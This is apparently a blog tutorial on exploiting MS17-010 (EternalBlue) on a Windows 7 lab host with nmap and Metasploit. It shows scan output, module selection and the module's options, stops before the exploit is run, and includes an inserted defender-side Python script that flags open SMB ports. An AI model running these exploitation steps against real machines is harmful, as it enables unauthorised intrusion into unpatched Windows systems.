Using Kali to exploit the ms17_010 (EternalBlue) vulnerability against Windows in a penetration test

2018-9-2 18:21 | Posted by: admin

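Test environment:

Attacking machine: Kali 2.0, 192.168.1.109

Target machine: Windows 7 64-bit, 192.168.1.107

Vulnerability used: ms17_010

Tools required

nmap

Metasploit

Penetration procedure:

Scan the target machine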

Bash
# nmap -sV 192.168.1.107
Starting Nmap 7.60 ( https://nmap.org ) at 2017-12-12 21:38 CST
Nmap scan report for 192.168.1.107
Host is up (0.00030s latency).
Not shown: 996 filtered ports
PORT     STATE SERVICE      VERSION
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
5357/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
MAC Address: 00:0C:29:19:6E:B7 (VMware)
Service Info: Host: HUGO-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.45 seconds

The scan shows that ports 135, 139 and 445 on the target machine are all open.
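Read from the defender's side, the same scan output is an exposure inventory. The following added example (not part of the original post) parses nmap's normal output and lists the hosts with SMB ports open, so their MS17-010 patch status and firewall rules can be checked; the second host in the sample and the function names are constructed for illustration.

```python
import re

# Constructed sample: the port table from the scan above, plus a second,
# made-up host (192.168.1.50) whose SMB port is filtered rather than open.
SAMPLE_SCAN = """\
Nmap scan report for 192.168.1.107
PORT     STATE SERVICE      VERSION
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
5357/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
MAC Address: 00:0C:29:19:6E:B7 (VMware)
Nmap scan report for 192.168.1.50
PORT    STATE    SERVICE
22/tcp  open     ssh
445/tcp filtered microsoft-ds
"""

SMB_PORTS = {139, 445}  # NetBIOS session service and direct-hosted SMB
HOST_RE = re.compile(r"^Nmap scan report for (?:\S+ \()?([^\s()]+)\)?$")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")

def parse_nmap(text):
    """Parse nmap normal output into {host: [port records]}."""
    hosts, current = {}, None
    for line in text.splitlines():
        line = line.rstrip()
        host = HOST_RE.match(line)
        if host:
            current = host.group(1)
            hosts.setdefault(current, [])
            continue
        port = PORT_RE.match(line)
        if port and current is not None:
            num, proto, state, service, version = port.groups()
            hosts[current].append({"port": int(num), "proto": proto,
                                   "state": state, "service": service,
                                   "version": version})
    return hosts

def smb_exposure(hosts):
    """Return {host: [open SMB ports]} for hosts accepting TCP on an SMB port."""
    findings = {}
    for host, ports in hosts.items():
        exposed = sorted(p["port"] for p in ports
                         if p["proto"] == "tcp" and p["state"] == "open"
                         and p["port"] in SMB_PORTS)
        if exposed:
            findings[host] = exposed
    return findings

if __name__ == "__main__":
    for host, ports in smb_exposure(parse_nmap(SAMPLE_SCAN)).items():
        print(f"{host}: SMB reachable on {ports}; verify MS17-010 patch status and filter 139/445")
```

Only ports in the `open` state are reported, so the constructed host with a filtered port 445 is left out of the findings.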

Start the Metasploit console

Bash
# msfconsole 
                                                  
                          ########                  #
                      #################            #
                   ######################         #
                  #########################      #
                ############################
               ##############################
               ###############################
              ###############################
              ##############################
                              #    ########   #
                 ##        ###        ####   ##
                                      ###   ###
                                    ####   ###
               ####          ##########   ####
               #######################   ####
                 ####################   ####
                  ##################  ####
                    ############      ##
                       ########        ###
                      #########        #####
                    ############      ######
                   ########      #########
                     #####       ########
                       ###       #########
                      ######    ############
                     #######################
                     #   #   ###  #   #   ##
                     ########################
                      ##     ##   ##     ##
                            https://metasploit.com
       =[ metasploit v4.16.20-dev                         ]
+ -- --=[ 1705 exploits - 970 auxiliary - 299 post        ]
+ -- --=[ 503 payloads - 40 encoders - 10 nops            ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
msf >

Select the ms17_010 exploit module

Bash
msf > use exploit/windows/smb/ms17_010_eternalblue

View the exploit module's options

Bash
msf exploit(ms17_010_eternalblue) > show options 
Module options (exploit/windows/smb/ms17_010_eternalblue):
   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   GroomAllocations    12               yes       Initial number of times to groom the kernel pool.
   GroomDelta          5                yes       The amount to increase the groom count by per try.
   MaxExploitAttempts  3                yes       The number of times to retry the exploit.
   ProcessName         spoolsv.exe      yes       Process to inject payload into.
   RHOST                                yes       The target address
   RPORT               445              yes       The target port (TCP)
   SMBDomain           .                no        (Optional) The Windows domain to use for authentication
   SMBPass                              no        (Optional) The password for the specified username
   SMBUser                              no        (Optional) The username to authenticate as
   VerifyArch          true             yes       Check if remote architecture matches exploit Target.
   VerifyTarget        true             yes       Check if remote OS matches exploit Target.
Exploit target:
   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs

end
